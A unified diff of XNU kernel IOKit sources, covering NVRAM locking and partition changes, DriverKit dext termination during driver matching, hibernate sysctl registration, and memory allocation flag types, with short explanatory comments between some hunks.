        OSDeclareDefaultStructorsWithDispatch(IOMemoryMap);
 #ifdef XNU_KERNEL_PRIVATE
 public:
+       IOOptionBits         fOptions;
        OSPtr<IOMemoryDescriptor>  fMemory;
        OSPtr<IOMemoryMap>         fSuperMap;
        mach_vm_size_t       fOffset;
@@ -847,10 +848,7 @@ public:
        mach_vm_size_t       fLength;
        task_t               fAddressTask;
        vm_map_t             fAddressMap;
-       IOOptionBits         fOptions;
        upl_t                fRedirUPL;
-       ipc_port_t           fRedirEntry;
-       IOMemoryDescriptor * fOwner;
        uint8_t              fUserClientUnmap;
 #if IOTRACKING
        IOTrackingUser       fTracking;
index 17f91c66ab9ccb8a146da9f76f42654c41d8e7d3..d556b9fab6c2f5eb91779eb6530495ccbbeb3c54 100644 (file)
@@ -79,10 +79,12 @@ class IODTNVRAM : public IOService
        OSDeclareDefaultStructors(IODTNVRAM);
 
 private:
+       friend class IODTNVRAMVariables;
+
        IONVRAMController      *_nvramController;
        OSPtr<const OSSymbol>  _registryPropertiesKey;
        UInt8                  *_nvramImage;
-       IOLock                 *_variableLock;
+       IORWLock               *_variableLock;
        IOLock                 *_controllerLock;
        UInt32                 _commonPartitionOffset;
        UInt32                 _commonPartitionSize;
@@ -151,7 +153,11 @@ private:
        IOReturn removePropertyInternal(const OSSymbol *aKey);
        IOReturn chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid,
            const char *variableName, OSDictionary **dict) const;
-       bool handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error);
+       IOReturn flushDict(const uuid_t *guid, IONVRAMOperation op);
+       bool handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error);
+       OSSharedPtr<OSObject> copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const;
+       IOReturn removePropertyWithGUIDAndName(const uuid_t *guid, const char *name);
+       IOReturn setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject);
 
 public:
        virtual bool init(IORegistryEntry *old, const IORegistryPlane *plane) APPLE_KEXT_OVERRIDE;
index 66c3a0341fa5130e499414bab3fc8b77b1269d33..2a5457662609225e28c5650a67ddc701db92afb1 100644 (file)
@@ -32,6 +32,7 @@ extern "C" {
 #include <machine/machine_routines.h>
 };
 
+#include <stdint.h>
 #include <IOKit/IOService.h>
 
 /*!
@@ -43,15 +44,25 @@ class IOPMGR : public IOService
        OSDeclareAbstractStructors(IOPMGR);
 
 public:
+       /*!
+        * @function        enableCPUCore
+        * @abstract        Enable a single CPU core.
+        * @discussion      Release a secondary CPU core from reset, and enable
+        *                  external IRQ delivery to the core.  XNU will not
+        *                  invoke this method on the boot CPU's cpu_id.
+        * @param cpu_id    Logical CPU ID of the core.
+        * @param entry_pa  Physical address to use as the reset vector on the
+        *                  secondary CPU.  Not all platforms will honor this
+        *                  parameter; on Apple Silicon RVBAR_EL1 is programmed
+        *                  by iBoot.
+        */
+       virtual void enableCPUCore(unsigned int cpu_id, uint64_t entry_pa);
+
        /*!
         * @function      enableCPUCore
-        * @abstract      Enable a single CPU core.
-        * @discussion    Release a secondary CPU core from reset, and enable
-        *                external IRQ delivery to the core.  XNU will not
-        *                invoke this method on the boot CPU's cpu_id.
-        * @param cpu_id  Logical CPU ID of the core.
+        * @abstract      Deprecated - Enable a single CPU core.
         */
-       virtual void enableCPUCore(unsigned int cpu_id) = 0;
+       virtual void enableCPUCore(unsigned int cpu_id);
 
        /*!
         * @function      disableCPUCore
index 6e3e852a352f470fdbdb1928769b66d19f721a60..8954d781cd60cd60abd507cddd9b38110a5b68ac 100644 (file)
@@ -79,7 +79,8 @@ enum {
        kPEPagingOff,
        kPEPanicBegin,
        kPEPanicEnd,
-       kPEPanicRestartCPUNoCallouts
+       kPEPanicRestartCPUNoCallouts,
+       kPEPanicDiagnosticsDone,
 };
 
 /* Bitmask of details related to panic callouts */
@@ -95,6 +96,7 @@ extern int PEHaltRestartInternal(unsigned int type, uint32_t details);
 enum {
        kIOSystemShutdownNotificationStageProcessExit = 0,
        kIOSystemShutdownNotificationStageRootUnmount = 1,
+       kIOSystemShutdownNotificationTerminateDEXTs   = 2,
 };
 extern void IOSystemShutdownNotification(int stage);
 
index ba3c5063f8d8e1d1483371442398e50ba5cfcc27..47756e784b1683f2d649b048d374675f5b51915f 100644 (file)
@@ -239,6 +239,12 @@ public:
 
        static void initialize();
 
+       inline static bool
+       isEnabled()
+       {
+               return enabled;
+       }
+
        static void onKextLoad(OSKext *kext, kmod_info_t *kmod_info);
        static void onKextUnload(OSKext *kext);
        static void onClassAdded(OSKext *parentKext, OSMetaClass *metaClass);
index a750d3fec3b7b28e99826018f2ddd1c695e5c670..a9c8d122f1c2afc5d5734c4734dcc846dc76878d 100644 (file)
@@ -142,6 +142,7 @@ void serverAdd(IOUserServer * server);
 void serverRemove(IOUserServer * server);
 void serverAck(IOUserServer * server);
 bool serverSlept(void);
+void systemHalt(void);
 };
 
 /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
@@ -204,6 +205,7 @@ public:
        void                   setDriverKitUUID(OSKext *kext);
        void                   setCheckInToken(IOUserServerCheckInToken *token);
        void                   systemPower(bool powerOff);
+       void                               systemHalt(void);
        IOReturn                                setPowerState(unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE;
        IOReturn                                powerStateWillChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE;
        IOReturn                                powerStateDidChangeTo(IOPMPowerFlags flags, unsigned long state, IOService * service) APPLE_KEXT_OVERRIDE;
index 1f2b651ad7c0c2572253010cc19a416e7841abd3..bbcbe802fb397d9416a582ceaf67ba73eb806421 100644 (file)
@@ -672,6 +672,7 @@ enum {
        kIOPSFamilyCodeExternal4     = iokit_family_err(sub_iokit_pmu, 4),
        kIOPSFamilyCodeExternal5     = iokit_family_err(sub_iokit_pmu, 5),
        kIOPSFamilyCodeExternal6     = iokit_family_err(sub_iokit_pmu, 6),
+       kIOPSFamilyCodeExternal7     = iokit_family_err(sub_iokit_pmu, 7),
 };
 
 // values for kIOPMPSAdapterDetailsErrorFlagsKey
index 4c1eb9eecf4a136655e68afce3ea626fc1180053..690bb80416d0ae3bc5ecd4dcee04775bdc01d5f6 100644 (file)
@@ -112,9 +112,6 @@ enum {
 #define kIOPMMessageRequestUserActive \
                 iokit_family_msg(sub_iokit_powermanagement, 0x460)
 
-#define kIOPMMessageRequestSystemShutdown \
-                iokit_family_msg(sub_iokit_powermanagement, 0x470)
-
 /* @enum SystemSleepReasons
  * @abstract The potential causes for system sleep as logged in the system event record.
  */
index 7b670bf53e2c6ba5b30f02131b871aff31df4060..de3e2cdd408a04191c750f78cba218b9efe4082d 100644 (file)
@@ -83,10 +83,9 @@ IOBMDPageProc(iopa_t * a)
 {
        kern_return_t kr;
        vm_address_t  vmaddr  = 0;
-       int           options = 0;// KMA_LOMEM;
 
        kr = kernel_memory_allocate(kernel_map, &vmaddr,
-           page_size, 0, options, VM_KERN_MEMORY_IOKIT);
+           page_size, 0, KMA_NONE, VM_KERN_MEMORY_IOKIT);
 
        if (KERN_SUCCESS != kr) {
                vmaddr = 0;
index 958022743b026089271787cf5359243d662bb5c6..a57b083a7213be51dda569145d995fb69856bce8 100644 (file)
@@ -73,6 +73,7 @@ OSSharedPtr<const OSSymbol> gIOClassKey;
 OSSharedPtr<const OSSymbol> gIOProbeScoreKey;
 OSSharedPtr<const OSSymbol> gIOModuleIdentifierKey;
 OSSharedPtr<const OSSymbol> gIOModuleIdentifierKernelKey;
+OSSharedPtr<const OSSymbol> gIOHIDInterfaceClassName;
 IORWLock       * gIOCatalogLock;
 
 #if PRAGMA_MARK
@@ -113,6 +114,7 @@ IOCatalogue::initialize(void)
        gIOProbeScoreKey             = OSSymbol::withCStringNoCopy( kIOProbeScoreKey );
        gIOModuleIdentifierKey       = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKey );
        gIOModuleIdentifierKernelKey = OSSymbol::withCStringNoCopy( kCFBundleIdentifierKernelKey );
+       gIOHIDInterfaceClassName     = OSSymbol::withCStringNoCopy( "IOHIDInterface" );
 
 
        assert( array && gIOClassKey && gIOProbeScoreKey
@@ -808,7 +810,9 @@ IOCatalogue::terminateDriversForModule(
 {
        IOReturn ret;
        OSSharedPtr<OSDictionary> dict;
+       OSSharedPtr<OSKext> kext;
        bool isLoaded = false;
+       bool isDext = false;
 
        /* Check first if the kext currently has any linkage dependents;
         * in such a case the unload would fail so let's not terminate any
@@ -829,6 +833,11 @@ IOCatalogue::terminateDriversForModule(
                        goto finish;
                }
        }
+       kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy());
+       if (kext) {
+               isDext = kext->isDriverKit();
+       }
+
        dict = OSDictionary::withCapacity(1);
        if (!dict) {
                ret = kIOReturnNoMemory;
@@ -839,20 +848,25 @@ IOCatalogue::terminateDriversForModule(
 
        ret = terminateDrivers(dict.get(), NULL);
 
-       /* No goto between IOLock calls!
-        */
-       IORWLockWrite(lock);
-       if (kIOReturnSuccess == ret) {
-               ret = _removeDrivers(dict.get());
-       }
+       if (isDext) {
+               /* Force rematching after removing personalities. Dexts are never considered to be "loaded" (from OSKext),
+                * so we can't call unloadModule() to remove personalities and start rematching. */
+               removeDrivers(dict.get(), true);
+       } else {
+               /* No goto between IOLock calls!
+                */
+               IORWLockWrite(lock);
+               if (kIOReturnSuccess == ret) {
+                       ret = _removeDrivers(dict.get());
+               }
 
-       // Unload the module itself.
-       if (unload && isLoaded && ret == kIOReturnSuccess) {
-               ret = unloadModule(moduleName);
+               // Unload the module itself.
+               if (unload && isLoaded && ret == kIOReturnSuccess) {
+                       ret = unloadModule(moduleName);
+               }
+               IORWLockUnlock(lock);
        }
 
-       IORWLockUnlock(lock);
-
 finish:
        return ret;
 }
@@ -926,6 +940,8 @@ bool
 IOCatalogue::startMatching( const OSSymbol * moduleName )
 {
        OSSharedPtr<OSOrderedSet> set;
+       OSSharedPtr<OSKext>       kext;
+       OSSharedPtr<OSArray>      servicesToTerminate;
 
        if (!moduleName) {
                return false;
@@ -939,6 +955,53 @@ IOCatalogue::startMatching( const OSSymbol * moduleName )
 
        IORWLockRead(lock);
 
+       kext = OSKext::lookupKextWithIdentifier(moduleName->getCStringNoCopy());
+       if (kext && kext->isDriverKit()) {
+               /* We're here because kernelmanagerd called IOCatalogueModuleLoaded after launching a dext.
+                * Determine what providers the dext would match against. If there's something already attached
+                * to the provider, terminate it.
+                *
+                * This is only safe to do for HID dexts.
+                */
+               OSSharedPtr<OSArray> dextPersonalities = kext->copyPersonalitiesArray();
+
+               if (!dextPersonalities) {
+                       return false;
+               }
+
+               servicesToTerminate = OSArray::withCapacity(1);
+               if (!servicesToTerminate) {
+                       return false;
+               }
+
+               dextPersonalities->iterateObjects(^bool (OSObject * obj) {
+                       OSDictionary * personality = OSDynamicCast(OSDictionary, obj);
+                       OSSharedPtr<OSIterator> iter;
+                       IOService * provider;
+                       OSSharedPtr<IOService> service;
+                       const OSSymbol * category;
+
+                       if (personality) {
+                               category = OSDynamicCast(OSSymbol, personality->getObject(gIOMatchCategoryKey));
+                               if (!category) {
+                                       category = gIODefaultMatchCategoryKey;
+                               }
+                               iter = IOService::getMatchingServices(personality);
+
+                               while (iter && (provider = OSDynamicCast(IOService, iter->getNextObject()))) {
+                                       if (provider->metaCast(gIOHIDInterfaceClassName.get()) != NULL) {
+                                               service.reset(provider->copyClientWithCategory(category), OSNoRetain);
+                                               if (service) {
+                                                       servicesToTerminate->setObject(service);
+                                               }
+                                       }
+                               }
+                       }
+
+                       return false;
+               });
+       }
+
        personalities->iterateObjects(^bool (const OSSymbol * key, OSObject * value) {
                OSArray      * array;
                OSDictionary * dict;
@@ -958,6 +1021,22 @@ IOCatalogue::startMatching( const OSSymbol * moduleName )
                return false;
        });
 
+       if (servicesToTerminate) {
+               servicesToTerminate->iterateObjects(^bool (OSObject * obj) {
+                       IOService * service = OSDynamicCast(IOService, obj);
+                       if (service) {
+                               IOOptionBits terminateOptions = kIOServiceRequired;
+                               if (service->hasUserServer()) {
+                                       terminateOptions |= kIOServiceTerminateNeedWillTerminate;
+                               }
+                               if (!service->terminate(terminateOptions)) {
+                                       IOLog("%s: failed to terminate service %s-0x%qx with options %08llx for new dext %s\n", __FUNCTION__, service->getName(), service->getRegistryEntryID(), (long long)terminateOptions, moduleName->getCStringNoCopy());
+                               }
+                       }
+                       return false;
+               });
+       }
+
        // Start device matching.
        if (set->getCount() > 0) {
                IOService::catalogNewDrivers(set.get());
index 484656a0d2ee3ffebb9efc20046e2d74ba7c9257..5da53410f42b00ffb1cc7976bcf92561d12bf5b4 100644 (file)
@@ -664,7 +664,7 @@ IODMACommand::walkAll(uint32_t op)
                                }
 
                                kr = vm_page_alloc_list(state->fCopyPageCount,
-                                   KMA_LOMEM | KMA_NOPAGEWAIT, &mapBase);
+                                   (kma_flags_t)(KMA_LOMEM | KMA_NOPAGEWAIT), &mapBase);
                                if (KERN_SUCCESS != kr) {
                                        DEBG("vm_page_alloc_list(%d) failed (%d)\n", state->fCopyPageCount, kr);
                                        mapBase = NULL;
index 2fc024f6e1fa20b9a78b35e2fca5799c1943d7ee..3303016d05a404c9336861e8e49e04d742a1a8ae 100644 (file)
@@ -1462,36 +1462,37 @@ IOHibernateWasScreenLocked(void)
 /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
 
 SYSCTL_STRING(_kern, OID_AUTO, hibernatefile,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     gIOHibernateFilename, sizeof(gIOHibernateFilename), "");
 SYSCTL_STRING(_kern, OID_AUTO, bootsignature,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     gIOHibernateBootSignature, sizeof(gIOHibernateBootSignature), "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatemode,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOHibernateMode, 0, "");
 SYSCTL_STRUCT(_kern, OID_AUTO, hibernatestatistics,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &_hibernateStats, hibernate_statistics_t, "");
-SYSCTL_STRING(_kern_bridge, OID_AUTO, bootsessionuuid,
-    CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
-    gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString), "");
+SYSCTL_OID_MANUAL(_kern_bridge, OID_AUTO, bootsessionuuid,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    gIOHibernateBridgeBootSessionUUIDString, sizeof(gIOHibernateBridgeBootSessionUUIDString),
+    sysctl_handle_string, "A", "");
 
 SYSCTL_UINT(_kern, OID_AUTO, hibernategraphicsready,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.graphicsReadyTime, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatewakenotification,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.wakeNotificationTime, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatelockscreenready,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.lockScreenReadyTime, 0, "");
 SYSCTL_UINT(_kern, OID_AUTO, hibernatehidready,
-    CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &_hibernateStats.hidReadyTime, 0, "");
 
 SYSCTL_UINT(_kern, OID_AUTO, hibernatecount,
-    CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_ANYBODY,
+    CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_ANYBODY,
     &gIOHibernateCount, 0, "");
 
 /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
@@ -1561,16 +1562,6 @@ IOHibernateSystemInit(IOPMrootDomain * rootDomain)
                gIOHibernateFilename[0] = 0;
        }
 
-       sysctl_register_oid(&sysctl__kern_hibernatefile);
-       sysctl_register_oid(&sysctl__kern_bootsignature);
-       sysctl_register_oid(&sysctl__kern_hibernatemode);
-       sysctl_register_oid(&sysctl__kern_hibernatestatistics);
-       sysctl_register_oid(&sysctl__kern_hibernategraphicsready);
-       sysctl_register_oid(&sysctl__kern_hibernatewakenotification);
-       sysctl_register_oid(&sysctl__kern_hibernatelockscreenready);
-       sysctl_register_oid(&sysctl__kern_hibernatehidready);
-       sysctl_register_oid(&sysctl__kern_hibernatecount);
-
        gIOChosenEntry = IORegistryEntry::fromPath("/chosen", gIODTPlane);
 
        if (gIOChosenEntry
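
The hibernate sysctl changes above go together: dropping CTLFLAG_NOAUTO lets those OIDs register automatically with the static sysctl tree, which is why the explicit sysctl_register_oid() calls are deleted from IOHibernateSystemInit() in the hunk above; only kern.bridge.bootsessionuuid keeps CTLFLAG_NOAUTO, now declared through SYSCTL_OID_MANUAL. A rough user-space analogy of automatic versus manual registration, assuming a toy Registry type (this is not the kernel's sysctl machinery):

    #include <cstdio>
    #include <string>
    #include <vector>

    struct Registry {
            static std::vector<std::string> &oids()
            {
                    static std::vector<std::string> v;
                    return v;
            }
    };

    // "Automatic" OID: registers itself during static initialization,
    // the analogue of a SYSCTL_* declaration without CTLFLAG_NOAUTO.
    struct AutoOid {
            explicit AutoOid(const char *name) { Registry::oids().push_back(name); }
    };

    static AutoOid kern_hibernatemode("kern.hibernatemode");

    int
    main(void)
    {
            // "Manual" OID: appears only once some init path registers it,
            // the analogue of SYSCTL_OID_MANUAL plus a later sysctl_register_oid().
            Registry::oids().push_back("kern.bridge.bootsessionuuid");

            for (const auto &name : Registry::oids()) {
                    printf("%s\n", name.c_str());
            }
            return 0;
    }
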
index 0a4213b386a86f8a29fc7af075f610cff05deff6..b61d58a142e3de27e006e59fd5a932ffd0671d37 100644 (file)
@@ -77,7 +77,7 @@ sysctl_debug_iokit
 }
 
 SYSCTL_PROC(_debug, OID_AUTO, iokit,
-    CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_QUAD | IODEBUG_CTLFLAGS | CTLFLAG_KERN | CTLFLAG_LOCKED,
     &gIOKitDebug, 0, sysctl_debug_iokit, "Q", "boot_arg io");
 
 size_t          debug_malloc_size;
index 1cbb0485d8811e642ccfdff4ac1a0d8782d28d0c..a829c88d418e1e79435ee44b44f3fc66273b4134 100644 (file)
@@ -198,6 +198,9 @@ extern bool gCPUsRunning;
 
 extern OSSet * gIORemoveOnReadProperties;
 
+extern uint32_t gHaltTimeMaxLog;
+extern uint32_t gHaltTimeMaxPanic;
+
 extern "C" void IOKitInitializeTime( void );
 extern void IOMachPortInitialize(void);
 
@@ -214,8 +217,6 @@ extern "C" void IOKitKernelLogBuffer(const char * title, const void * buffer, si
 extern const OSSymbol * gIOCreateEFIDevicePathSymbol;
 extern "C" void IOSetKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor * data);
 extern "C" void IOSetAPFSKeyStoreData(LIBKERN_CONSUMED IOMemoryDescriptor* data);
-extern "C" void IOSetARVRootHashData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData);
-extern "C" void IOSetARVManifestData(LIBKERN_CONSUMED IOMemoryDescriptor* arvData);
 #endif
 extern const  OSSymbol * gAKSGetKey;
 
index 6d3312369f072816838748aa8bb8bbd682a150f6..8246f6261cfb46b911629d25b4476a8faa60e09d 100644 (file)
@@ -451,7 +451,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size,
                address = 0; /* overflow detected */
        } else if (adjustedSize >= page_size) {
                kr = kernel_memory_allocate(kernel_map, &address,
-                   size, alignMask, 0, IOMemoryTag(kernel_map));
+                   size, alignMask, KMA_NONE, IOMemoryTag(kernel_map));
                if (KERN_SUCCESS != kr) {
                        address = 0;
                }
@@ -465,7 +465,7 @@ IOMallocAligned_internal(struct kalloc_heap *kheap, vm_size_t size,
 
                if (adjustedSize >= page_size) {
                        kr = kernel_memory_allocate(kernel_map, &allocationAddress,
-                           adjustedSize, 0, 0, IOMemoryTag(kernel_map));
+                           adjustedSize, 0, KMA_NONE, IOMemoryTag(kernel_map));
                        if (KERN_SUCCESS != kr) {
                                allocationAddress = 0;
                        }
@@ -628,7 +628,7 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP
            || (alignment > page_size);
 
        if (contiguous || maxPhys) {
-               int options = 0;
+               kma_flags_t options = KMA_NONE;
                vm_offset_t virt;
 
                adjustedSize = size;
@@ -643,14 +643,15 @@ IOKernelAllocateWithPhysicalRestrict(mach_vm_size_t size, mach_vm_address_t maxP
 #endif
                        if (maxPhys <= 0xFFFFFFFF) {
                                maxPhys = 0;
-                               options |= KMA_LOMEM;
+                               options = (kma_flags_t)(options | KMA_LOMEM);
                        } else if (gIOLastPage && (atop_64(maxPhys) > gIOLastPage)) {
                                maxPhys = 0;
                        }
                }
                if (contiguous || maxPhys) {
                        kr = kmem_alloc_contig(kernel_map, &virt, size,
-                           alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask), 0, IOMemoryTag(kernel_map));
+                           alignMask, (ppnum_t) atop(maxPhys), (ppnum_t) atop(alignMask),
+                           KMA_NONE, IOMemoryTag(kernel_map));
                } else {
                        kr = kernel_memory_allocate(kernel_map, &virt,
                            size, alignMask, options, IOMemoryTag(kernel_map));
index e4accd2085b30641d23b08b734269b2e52ba20bd..348cc897548338c9f4a9a71014bd4bffc1ba0ede 100644 (file)
@@ -5307,12 +5307,6 @@ IOMemoryMap::free()
                fMemory.reset();
        }
 
-       if (fOwner && (fOwner != fMemory)) {
-               LOCK;
-               fOwner->removeMapping(this);
-               UNLOCK;
-       }
-
        if (fSuperMap) {
                fSuperMap.reset();
        }
index 69725d4036657eaf7c4a6ca8da913764f24fd422..06d2efcdbad7a48add563e25a5b956581d7fada8 100644 (file)
@@ -40,6 +40,7 @@
 #include <kern/debug.h>
 #include <pexpert/boot.h>
 #include <pexpert/pexpert.h>
+#include <sys/csr.h>
 
 #define super IOService
 
 // From Apple CHRP Spec
 #define NVRAM_CHRP_SIG_SYSTEM    0x70
 #define NVRAM_CHRP_SIG_CONFIG    0x71
-#define NVRAM_CHRP_SIG_FREESPACE 0x7F
 
-#define NVRAM_CHRP_PARTITION_NAME_COMMON        "common"
-#define NVRAM_CHRP_PARTITION_NAME_SYSTEM        "system"
-#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY "secure"
-#define NVRAM_CHRP_PARTITION_NAME_FREESPACE     "\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77"
+#define NVRAM_CHRP_PARTITION_NAME_COMMON_V1   "common"
+#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1   "system"
+#define NVRAM_CHRP_PARTITION_NAME_COMMON_V2   "2common"
+#define NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2   "2system"
 
 #define NVRAM_CHRP_LENGTH_BLOCK_SIZE 0x10 // CHRP length field is in 16 byte blocks
 
@@ -112,26 +112,43 @@ OSDefineMetaClassAndStructors(IODTNVRAM, IOService);
                IOLockUnlock(_controllerLock);       \
 })
 
-#define NVRAMLOCK()                              \
-({                                               \
+#define NVRAMREADLOCK()                             \
+({                                                  \
        if (preemption_enabled() && !panic_active()) \
-               IOLockLock(_variableLock);           \
+               IORWLockRead(_variableLock);         \
 })
 
-#define NVRAMUNLOCK()                            \
-({                                               \
+#define NVRAMWRITELOCK()                            \
+({                                                  \
        if (preemption_enabled() && !panic_active()) \
-               IOLockUnlock(_variableLock);         \
+               IORWLockWrite(_variableLock);        \
 })
 
-#define NVRAMLOCKASSERT()                                    \
-({                                                           \
-       if (preemption_enabled() && !panic_active())             \
-               IOLockAssert(_variableLock, kIOLockAssertOwned); \
+#define NVRAMUNLOCK()                               \
+({                                                  \
+       if (preemption_enabled() && !panic_active()) \
+               IORWLockUnlock(_variableLock);       \
+})
+
+#define NVRAMLOCKASSERTHELD()                                      \
+({                                                                 \
+       if (preemption_enabled() && !panic_active())                \
+               IORWLockAssert(_variableLock, kIORWLockAssertHeld); \
 })
 
+#define NVRAMLOCKASSERTEXCLUSIVE()                                  \
+({                                                                  \
+       if (preemption_enabled() && !panic_active())                 \
+               IORWLockAssert(_variableLock, kIORWLockAssertWrite); \
+})
+
+enum NVRAMPartitionType {
+       kIONVRAMPartitionSystem,
+       kIONVRAMPartitionCommon
+};
+
 typedef struct {
-       const char                *name;
+       NVRAMPartitionType        type;
        UInt32                    offset;
        UInt32                    size;
        OSSharedPtr<OSDictionary> &dict;
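
The locking macros rewritten above move _variableLock from a mutex to a reader/writer lock: lookups take NVRAMREADLOCK() and may run concurrently, mutations take NVRAMWRITELOCK() for exclusive access, and the two assertion macros check held versus exclusive ownership. A minimal stand-alone sketch of the same read/write split using std::shared_mutex (C++17) as an analogy only; the kernel code uses IORWLockRead/IORWLockWrite:

    #include <map>
    #include <shared_mutex>
    #include <string>

    static std::shared_mutex gVarLock;
    static std::map<std::string, std::string> gVars;

    // Readers share the lock, like NVRAMREADLOCK().
    std::string
    readVar(const std::string &name)
    {
            std::shared_lock<std::shared_mutex> lock(gVarLock);
            auto it = gVars.find(name);
            return it == gVars.end() ? std::string() : it->second;
    }

    // Writers hold it exclusively, like NVRAMWRITELOCK().
    void
    writeVar(const std::string &name, const std::string &value)
    {
            std::unique_lock<std::shared_mutex> lock(gVarLock);
            gVars[name] = value;
    }

    int
    main(void)
    {
            writeVar("boot-args", "-v");
            return readVar("boot-args").empty();
    }
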
@@ -147,130 +164,29 @@ UUID_DEFINE(gAppleSystemVariableGuid, 0x40, 0xA0, 0xDD, 0xD2, 0x77, 0xF8, 0x43,
 UUID_DEFINE(gAppleNVRAMGuid, 0x7C, 0x43, 0x61, 0x10, 0xAB, 0x2A, 0x4B, 0xBB, 0xA8, 0x80, 0xFE, 0x41, 0x99, 0x5C, 0x9F, 0x82);
 
 static bool gNVRAMLogging = false;
+static bool gInternalBuild = false;
 
 // allowlist variables from macboot that need to be set/get from system region if present
 static const char * const gNVRAMSystemList[] = {
-       "adbe-tunable",
-       "adbe-tunables",
-       "adfe-tunables",
-       "alamo-path",
-       "alt-boot-volume",
-       "ASMB",
-       "atc0",
-       "atc1",
+       "allow-root-hash-mismatch",
        "auto-boot",
        "auto-boot-halt-stage",
-       "auto-boot-once",
-       "auto-boot-usb",
-       "auxkc-path",
-       "backlight-level",
-       "backlight-nits",
        "base-system-path",
        "boot-args",
-       "boot-breadcrumbs",
        "boot-command",
-       "boot-device",
        "boot-image",
-       "boot-partition",
-       "boot-path",
-       "boot-ramdisk",
-       "boot-script",
-       "boot-volume",
        "bootdelay",
-       "bt1addr",
-       "btaddr",
-       "cam-use-ext-ldo",
-       "CLCG_override",
        "com.apple.System.boot-nonce",
-       "com.apple.System.rtc-offset",
-       "com.apple.System.tz0-size",
-       "core-bin-offset",
-       "cpu-bin-offset",
        "darkboot",
-       "DClr_override",
-       "dcp-auto-boot",
-       "debug-gg",
-       "debug-soc",
-       "debug-uarts",
-       "diags-path",
-       "disable-boot-wdt",
-       "display-color-space",
-       "display-timing",
-       "display-vsh-comp",
-       "dpcd-max-brightness",
-       "dtdump",
-       "dtdump-path",
-       "e75",
        "emu",
-       "enable-auth-debug",
-       "enable-jop",
-       "enable-marconi",
-       "enable-upgrade-fallback",
-       "enforce-iuob",
-       "eth1addr",
-       "ethaddr",
-       "failboot-breadcrumbs",
-       "fixed-lcm-boost",
-       "force-ctrr-lock",
-       "force-upgrade-fail",
-       "fuos-path",
-       "hib-ui-force",
-       "hibhack-test-hmac",
-       "iboot-data",
-       "iboot-failure-reason",
-       "iboot-failure-reason-str",
-       "iboot-failure-volume",
-       "iboot1-precommitted",
-       "idle-off",
-       "is-tethered",
-       "kaslr-off",
-       "kaslr-slide",
-       "kis-rsm",
-       "knobs",
-       "loadaddr",
-       "memmapdump",
-       "mipi-bridge-cmd-verify",
-       "mipi-bridge-poll-cmd-fifo",
-       "no-ctrr",
-       "one-time-boot-command",
-       "osenvironment",
-       "ota-breadcrumbs",
-       "ota-outcome",
-       "panicmedic",
-       "panicmedic-threshold",
-       "panicmedic-timestamps",
-       "phleet-path",
-       "pinot-panel-id",
-       "pintoaddr",
+       "one-time-boot-command", // Needed for diags customer install flows
        "policy-nonce-digests",
-       "preserve-debuggability",
        "prevent-restores", // Keep for factory <rdar://problem/70476321>
        "prev-lang:kbd",
-       "ramrod-kickstart-aces",
-       "rbdaddr0",
